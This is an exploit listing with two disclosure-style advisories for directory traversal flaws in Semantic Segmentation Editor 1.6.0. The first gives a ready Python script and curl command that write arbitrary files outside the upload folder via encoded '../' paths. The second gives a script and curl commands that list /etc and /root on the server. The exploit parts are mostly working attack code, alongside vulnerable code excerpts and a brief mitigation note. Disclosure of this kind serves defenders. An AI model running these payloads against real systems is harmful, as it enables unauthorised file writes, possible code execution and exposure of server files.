Exploit for Semantic Segmentation Editor 1.6.0 Directory Traversal

Name: Exploit for Semantic Segmentation Editor 1.6.0 Directory Traversal
Rating: 5 (46 reviews)
2025-03-17 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:189845
**Exploit Title:** Semantic Segmentation Editor 1.6.0 - Directory Traversal File Upload  
    **Date:** 2025-03-14  
    **Exploit Author:** Fatih Türüt ([defendzero.com](https://defendzero.com))  
    **Vendor Homepage:** [Hitachi Automotive & Industry Lab](https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor)  
    **Software Download:** [Semantic Segmentation Editor 1.6.0](https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor/archive/refs/tags/1.6.0.zip)  
    **Version:** 1.6.0  
    **Tested on:** macOS 24.3.0  
    **Category:** Webapps  
    **CVE:** N/A  
    
    ---  
    
    ## **Description:**  
    A **directory traversal vulnerability** exists in **Semantic Segmentation Editor 1.6.0** due to improper path validation in the file upload functionality.  
    This flaw allows an attacker to manipulate file paths and write arbitrary files outside the intended directory on the server.  
    
    ### **Vulnerable Component:**  
    - **File:** `server/main.js`  
    - **Function:** `'saveData'(sample)`  
    - **Issue:** User input is decoded and processed without validating whether the file remains inside the allowed directory.  
    
    ### **Vulnerable Code:**  
    ```javascript  
    'saveData'(sample) {  
        if (demoMode) return;  
        const attrs = url.parse(sample.url);  
        let path = decodeURIComponent(attrs.pathname);  
        sample.folder = path.substring(1, path.lastIndexOf("/"));  
        sample.file = path.substring(path.lastIndexOf("/") + 1);  
        // No path validation is performed  
    }  
    ```  
    
    ---  
    
    ## **Proof of Concept (PoC):**  
    An attacker can exploit this vulnerability by crafting a request to save files outside the intended directory.  
    
    ### **Exploit Script (Python)**  
    ```python  
    import requests  
    
    # Target file path  
    target_path = "../../../tmp/malicious.txt"  
    encoded_path = target_path.replace("../", "%2f..%2f")  
    
    url = f"http://target:3000/save/{encoded_path}"  
    content = "Malicious content here"  
    
    # Send content directly  
    response = requests.post(url, data=content)  
    print(response.text)  
    ```  
    
    ---  
    
    ### **Example curl Command:**  
    ```bash  
    curl -X POST -d "Malicious content here" "http://target:3000/save/%2f..%2f..%2f..%2ftmp%2fmalicious.txt"  
    ```  
    
    ---  
    
    ## **Impact:**  
    Successful exploitation allows an attacker to write arbitrary files to the server, potentially leading to remote code execution (RCE) if an executable file is placed in a web-accessible directory.  
    
    ### **Mitigation:**  
    The vendor should implement proper path validation and restrict file writes to the intended directory using functions like `path.resolve()` or `path.normalize()` in Node.js.  
    
    ---
    
    
    
    ----------------------------------------
    
    Title: Semantic Segmentation Editor 1.6.0 - Directory Traversal Vulnerability
    
    Description:
    A directory traversal vulnerability exists in **Semantic Segmentation Editor 1.6.0** due to improper path validation. An attacker can manipulate the directory browsing endpoint to list arbi
    trary directories on the server.
    
    Source URL: https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor
    
    Source Name/Email: Halil İbrahim İlhan (halil@defendzero.com)
    
    CVEs: N/A
    
    Software URL: https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor/archive/refs/tags/1.6.0.zip
    
    Vulnerable Component:
    - **File:** server/main.js
    - **Function:** 'images'(folder, pageIndex, pageLength)
    - **Issue:** The application decodes user input without validating if it stays within the intended directory scope.
    
    Vulnerable Code:
    ```javascript
    'images'(folder, pageIndex, pageLength) {
        const folderSlash = folder ? decodeURIComponent(folder) + "/" : "/";
        const leaf = join(config.imagesFolder, (folderSlash ? folderSlash : ""));
        // No path validation is performed before accessing the directory
        const dirs = getDirectories(leaf);
        const images = getImages(leaf);
    }
    
    ### **Proof of Concept (PoC): An attacker can exploit this vulnerability by sending specially crafted requests. The following Python script demonstrates the exploitation of the vulnerabilit
    y:**
    import requests
    
    def list_directory(path):
        """Exploit for directory traversal vulnerability in Semantic Segmentation Editor 1.6.0."""
        encoded_path = path.replace("../", "%2f..%2f")
    
        url = f"http://target:3000/browse/0/20/{encoded_path}"
    
        response = requests.get(url)
        print(f"Listing contents of: {path}")
        return response.text
    
    if __name__ == "__main__":
        print(list_directory("../../../etc"))  # List /etc directory
        print(list_directory("../../../root"))  # List /root directory
    
    
    ### **Example curl commands:**
    # List /etc directory
    curl -i "http://target:3000/browse/0/20/%2f..%2f..%2f..%2fetc"
    
    # List /root directory
    curl -i "http://target:3000/browse/0/20/%2f..%2f..%2f..%2froot"